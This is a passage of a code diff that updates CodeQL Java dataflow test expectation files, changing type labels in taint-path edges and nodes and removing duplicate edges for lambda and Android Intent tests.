MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:240:12:240:14 | parameter this : MyLocal2 [List l, ] : String | provenance | | -| B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:247:5:247:18 | List l : ArrayList [] : String | provenance | | +| B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:247:5:247:18 | List l : List [] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | provenance | MaD:3 | -| B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | B.java:247:5:247:18 | List l2 : ArrayList [] : String | provenance | | +| B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | B.java:247:5:247:18 | List l2 : List [] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | B.java:235:7:235:14 | parameter this : MyLocal2 [String s] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | provenance | MaD:2 | -| B.java:248:10:248:10 | l : ArrayList [] : String | B.java:248:10:248:17 | get(...) | provenance | MaD:3 | -| B.java:249:10:249:11 | l2 : ArrayList [] : String | B.java:249:10:249:18 | get(...) | provenance | MaD:3 | +| B.java:248:10:248:10 | l : List [] : String | B.java:248:10:248:17 | get(...) | provenance | MaD:3 | +| B.java:249:10:249:11 | l2 : List [] : String | B.java:249:10:249:18 | get(...) | provenance | MaD:3 | | B.java:254:16:254:29 | source(...) : String | B.java:261:5:261:18 | String s : String | provenance | | | B.java:255:11:255:18 | parameter this : MyLocal3 [String s] : String | B.java:255:11:255:18 | this <.method> : MyLocal3 [String s] : String | provenance | | | B.java:255:11:255:18 | parameter this : MyLocal3 [String s] : String | B.java:256:18:256:18 | this : MyLocal3 [String s] : String | provenance | | @@ -300,12 +300,12 @@ nodes | B.java:13:5:13:6 | l1 : ArrayList [] : String | semmle.label | l1 : ArrayList [] : String | | B.java:13:16:13:16 | e : String | semmle.label | e : String | | B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | semmle.label | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | -| B.java:13:16:13:29 | List l2 : ArrayList [] : String | semmle.label | List l2 : ArrayList [] : String | +| B.java:13:16:13:29 | List l2 : List [] : String | semmle.label | List l2 : List [] : String | | B.java:13:16:13:29 | parameter this [Return] : new Consumer(...) { ... } [List l2, ] : String | semmle.label | parameter this [Return] : new Consumer(...) { ... } [List l2, ] : String | | B.java:13:21:13:22 | l2 [post update] : ArrayList [] : String | semmle.label | l2 [post update] : ArrayList [] : String | | B.java:13:21:13:22 | this : new Consumer(...) { ... } [List l2, ] : String | semmle.label | this : new Consumer(...) { ... } [List l2, ] : String | | B.java:13:28:13:28 | e : String | semmle.label | e : String | -| B.java:14:10:14:11 | l2 : ArrayList [] : String | semmle.label | l2 : ArrayList [] : String | +| B.java:14:10:14:11 | l2 : List [] : String | semmle.label | l2 : List [] : String | | B.java:14:10:14:18 | get(...) | semmle.label | get(...) | | B.java:22:26:22:26 | x : String | semmle.label | x : String | | B.java:22:26:22:71 | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | semmle.label | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | @@ -319,14 +319,14 @@ nodes | B.java:34:10:34:18 | other.bf1 | semmle.label | other.bf1 | | B.java:38:23:38:45 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | | B.java:38:23:38:45 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | -| B.java:38:48:38:70 | out [Return] : HashMap [] : String | semmle.label | out [Return] : HashMap [] : String | -| B.java:38:48:38:70 | out [Return] : HashMap [] : String | semmle.label | out [Return] : HashMap [] : String | +| B.java:38:48:38:70 | out [Return] : Map [] : String | semmle.label | out [Return] : Map [] : String | +| B.java:38:48:38:70 | out [Return] : Map [] : String | semmle.label | out [Return] : Map [] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | -| B.java:39:17:39:56 | out : HashMap [] : String | semmle.label | out : HashMap [] : String | -| B.java:39:17:39:56 | out : HashMap [] : String | semmle.label | out : HashMap [] : String | +| B.java:39:17:39:56 | out : Map [] : String | semmle.label | out : Map [] : String | +| B.java:39:17:39:56 | out : Map [] : String | semmle.label | out : Map [] : String | | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:18:39:20 | key : String | semmle.label | key : String | @@ -390,23 +390,23 @@ nodes | B.java:103:12:103:13 | l1 : ArrayList [] : String | semmle.label | l1 : ArrayList [] : String | | B.java:104:16:104:32 | source(...) : String | semmle.label | source(...) : String | | B.java:107:5:107:6 | l2 : ArrayList [, ] : String | semmle.label | l2 : ArrayList [, ] : String | -| B.java:107:16:107:16 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | +| B.java:107:16:107:16 | l : List [] : String | semmle.label | l : List [] : String | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | semmle.label | ...->... : new Consumer>(...) { ... } [String s] : String | | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | semmle.label | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | semmle.label | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | -| B.java:107:16:111:6 | List out1 : ArrayList [] : String | semmle.label | List out1 : ArrayList [] : String | -| B.java:107:16:111:6 | List out2 : ArrayList [] : String | semmle.label | List out2 : ArrayList [] : String | +| B.java:107:16:111:6 | List out1 : List [] : String | semmle.label | List out1 : List [] : String | +| B.java:107:16:111:6 | List out2 : List [] : String | semmle.label | List out2 : List [] : String | | B.java:107:16:111:6 | String s : String | semmle.label | String s : String | | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | semmle.label | parameter this : new Consumer>(...) { ... } [String s] : String | | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | semmle.label | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out2, ] : String | semmle.label | parameter this [Return] : new Consumer>(...) { ... } [List out2, ] : String | -| B.java:107:21:107:21 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | +| B.java:107:21:107:21 | l : List [] : String | semmle.label | l : List [] : String | | B.java:107:31:107:31 | x : String | semmle.label | x : String | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | semmle.label | ...->... : new Consumer(...) { ... } [String s] : String | | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | semmle.label | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | semmle.label | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | -| B.java:107:31:111:5 | List out1 : ArrayList [] : String | semmle.label | List out1 : ArrayList [] : String | -| B.java:107:31:111:5 | List out2 : ArrayList [] : String | semmle.label | List out2 : ArrayList [] : String | +| B.java:107:31:111:5 | List out1 : List [] : String | semmle.label | List out1 : List [] : String | +| B.java:107:31:111:5 | List out2 : List [] : String | semmle.label | List out2 : List [] : String | | B.java:107:31:111:5 | String s : String | semmle.label | String s : String | | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | semmle.label | parameter this : new Consumer(...) { ... } [String s] : String | | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | semmle.label | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | @@ -423,9 +423,9 @@ nodes | B.java:110:7:110:10 | this : new Consumer(...) { ... } [List out2, ] : String | semmle.label | this : new Consumer(...) { ... } [List out2, ] : String | | B.java:110:16:110:16 | s : String | semmle.label | s : String | | B.java:110:16:110:16 | this : new Consumer(...) { ... } [String s] : String | semmle.label | this : new Consumer(...) { ... } [String s] : String | -| B.java:112:10:112:13 | out1 : ArrayList [] : String | semmle.label | out1 : ArrayList [] : String | +| B.java:112:10:112:13 | out1 : List [] : String | semmle.label | out1 : List [] : String | | B.java:112:10:112:20 | get(...) | semmle.label | get(...) | -| B.java:113:10:113:13 | out2 : ArrayList [] : String | semmle.label | out2 : ArrayList [] : String | +| B.java:113:10:113:13 | out2 : List [] : String | semmle.label | out2 : List [] : String | | B.java:113:10:113:20 | get(...) | semmle.label | get(...) | | B.java:126:19:126:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | | B.java:127:9:127:10 | l1 [post update] : ArrayList [] : String | semmle.label | l1 [post update] : ArrayList [] : String | @@ -438,13 +438,13 @@ nodes | B.java:131:16:131:17 | l1 : ArrayList [] : String | semmle.label | l1 : ArrayList [] : String | | B.java:131:16:131:17 | this : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | this : new TwoRuns(...) { ... } [List l1, ] : String | | B.java:131:16:131:24 | get(...) : String | semmle.label | get(...) : String | -| B.java:136:5:136:5 | List l1 : ArrayList [] : String | semmle.label | List l1 : ArrayList [] : String | +| B.java:136:5:136:5 | List l1 : List [] : String | semmle.label | List l1 : List [] : String | | B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | -| B.java:137:5:137:5 | List l1 : ArrayList [] : String | semmle.label | List l1 : ArrayList [] : String | -| B.java:137:5:137:5 | List l2 : ArrayList [] : String | semmle.label | List l2 : ArrayList [] : String | +| B.java:137:5:137:5 | List l1 : List [] : String | semmle.label | List l1 : List [] : String | +| B.java:137:5:137:5 | List l2 : List [] : String | semmle.label | List l2 : List [] : String | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | r : new TwoRuns(...) { ... } [List l1, ] : String | | B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | semmle.label | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | -| B.java:138:10:138:11 | l2 : ArrayList [] : String | semmle.label | l2 : ArrayList [] : String | +| B.java:138:10:138:11 | l2 : List [] : String | semmle.label | l2 : List [] : String | | B.java:138:10:138:18 | get(...) | semmle.label | get(...) | | B.java:142:16:142:31 | source(...) : String | semmle.label | source(...) : String | | B.java:145:7:145:13 | parameter this : MyLocal [String s] : String | semmle.label | parameter this : MyLocal [String s] : String | @@ -499,10 +499,10 @@ nodes | B.java:175:5:175:6 | String s2 : String | semmle.label | String s2 : String | | B.java:175:5:175:6 | m1 : MyLocal [String s2] : String | semmle.label | m1 : MyLocal [String s2] : String | | B.java:175:5:175:6 | m1 : MyLocal [f] : String | semmle.label | m1 : MyLocal [f] : String | -| B.java:177:5:177:6 | List l : ArrayList [] : String | semmle.label | List l : ArrayList [] : String | +| B.java:177:5:177:6 | List l : List [] : String | semmle.label | List l : List [] : String | | B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | semmle.label | m1 [post update] : MyLocal [List l, ] : String | | B.java:177:12:177:27 | source(...) : String | semmle.label | source(...) : String | -| B.java:178:10:178:11 | List l : ArrayList [] : String | semmle.label | List l : ArrayList [] : String | +| B.java:178:10:178:11 | List l : List [] : String | semmle.label | List l : List [] : String | | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | semmle.label | m2 : MyLocal [List l, ] : String | | B.java:178:10:178:17 | get(...) | semmle.label | get(...) | | B.java:203:16:203:42 | source(...) : String | semmle.label | source(...) : String | @@ -515,17 +515,17 @@ nodes | B.java:207:15:207:42 | source(...) : String | semmle.label | source(...) : String | | B.java:209:19:211:5 | parameter this : new Runnable(...) { ... } [String s] : String | semmle.label | parameter this : new Runnable(...) { ... } [String s] : String | | B.java:209:19:211:5 | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | semmle.label | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | -| B.java:210:7:210:8 | List out : ArrayList [] : String | semmle.label | List out : ArrayList [] : String | +| B.java:210:7:210:8 | List out : List [] : String | semmle.label | List out : List [] : String | | B.java:210:7:210:8 | String s : String | semmle.label | String s : String | | B.java:210:7:210:8 | r1 : new Runnable(...) { ... } [String s] : String | semmle.label | r1 : new Runnable(...) { ... } [String s] : String | | B.java:210:7:210:8 | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | semmle.label | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | semmle.label | this : new Runnable(...) { ... } [List out, ] : String | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [String s] : String | semmle.label | this : new Runnable(...) { ... } [String s] : String | -| B.java:212:5:212:6 | List out : ArrayList [] : String | semmle.label | List out : ArrayList [] : String | +| B.java:212:5:212:6 | List out : List [] : String | semmle.label | List out : List [] : String | | B.java:212:5:212:6 | String s : String | semmle.label | String s : String | | B.java:212:5:212:6 | r2 : new Runnable(...) { ... } [String s] : String | semmle.label | r2 : new Runnable(...) { ... } [String s] : String | | B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | semmle.label | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | -| B.java:213:10:213:12 | out : ArrayList [] : String | semmle.label | out : ArrayList [] : String | +| B.java:213:10:213:12 | out : List [] : String | semmle.label | out : List [] : String | | B.java:213:10:213:19 | get(...) | semmle.label | get(...) | | B.java:231:16:231:28 | source(...) : String | semmle.label | source(...) : String | | B.java:235:7:235:14 | parameter this : MyLocal2 [String s] : String | semmle.label | parameter this : MyLocal2 [String s] : String | @@ -541,15 +541,15 @@ nodes | B.java:241:16:241:16 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | | B.java:241:16:241:16 | this : MyLocal2 [List l, ] : String | semmle.label | this : MyLocal2 [List l, ] : String | | B.java:241:16:241:23 | get(...) : String | semmle.label | get(...) : String | -| B.java:247:5:247:18 | List l2 : ArrayList [] : String | semmle.label | List l2 : ArrayList [] : String | -| B.java:247:5:247:18 | List l : ArrayList [] : String | semmle.label | List l : ArrayList [] : String | +| B.java:247:5:247:18 | List l2 : List [] : String | semmle.label | List l2 : List [] : String | +| B.java:247:5:247:18 | List l : List [] : String | semmle.label | List l : List [] : String | | B.java:247:5:247:18 | String s : String | semmle.label | String s : String | | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | semmle.label | new MyLocal2(...) : MyLocal2 [List l, ] : String | | B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | semmle.label | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | semmle.label | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | -| B.java:248:10:248:10 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | +| B.java:248:10:248:10 | l : List [] : String | semmle.label | l : List [] : String | | B.java:248:10:248:17 | get(...) | semmle.label | get(...) | -| B.java:249:10:249:11 | l2 : ArrayList [] : String | semmle.label | l2 : ArrayList [] : String | +| B.java:249:10:249:11 | l2 : List [] : String | semmle.label | l2 : List [] : String | | B.java:249:10:249:18 | get(...) | semmle.label | get(...) | | B.java:254:16:254:29 | source(...) : String | semmle.label | source(...) : String | | B.java:255:11:255:18 | parameter this : MyLocal3 [String s] : String | semmle.label | parameter this : MyLocal3 [String s] : String | @@ -595,11 +595,11 @@ subpaths | B.java:30:14:30:24 | source(...) : String | B.java:22:26:22:26 | x : String | B.java:22:26:22:71 | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | B.java:30:5:30:5 | f [post update] : new Consumer(...) { ... } [B other, bf1] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:18:39:20 | key : String | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:23:39:27 | value : String | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | -| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | -| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | -| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : ArrayList [] : String | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | +| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | +| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | +| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : List [] : String | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out2, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | -| B.java:107:21:107:21 | l : ArrayList [] : String | B.java:107:31:107:31 | x : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | +| B.java:107:21:107:21 | l : List [] : String | B.java:107:31:107:31 | x : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | B.java:130:19:130:22 | parameter this : new TwoRuns(...) { ... } [List l1, ] : String | B.java:130:19:130:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l2, ] : String | B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | | B.java:148:17:148:29 | new MyLocal(...) [pre constructor] : MyLocal [String s] : String | B.java:145:7:145:13 | parameter this : MyLocal [String s] : String | B.java:145:7:145:13 | parameter this [Return] : MyLocal [f] : String | B.java:148:17:148:29 | new MyLocal(...) : MyLocal [f] : String | diff --git a/java/ql/test/library-tests/frameworks/android/intent/test.expected b/java/ql/test/library-tests/frameworks/android/intent/test.expected index 6e840c4f235..ed9eb6fb7ce 100644 --- a/java/ql/test/library-tests/frameworks/android/intent/test.expected +++ b/java/ql/test/library-tests/frameworks/android/intent/test.expected @@ -184,96 +184,50 @@ edges | Test.java:22:44:22:45 | it : Set [] : String | Test.java:22:44:22:56 | iterator(...) : Iterator [] : String | provenance | MaD:179 | | Test.java:22:44:22:56 | iterator(...) : Iterator [] : String | Test.java:22:44:22:63 | next(...) : String | provenance | MaD:180 | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | provenance | | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | provenance | MaD:34 | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | provenance | MaD:34 | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | provenance | 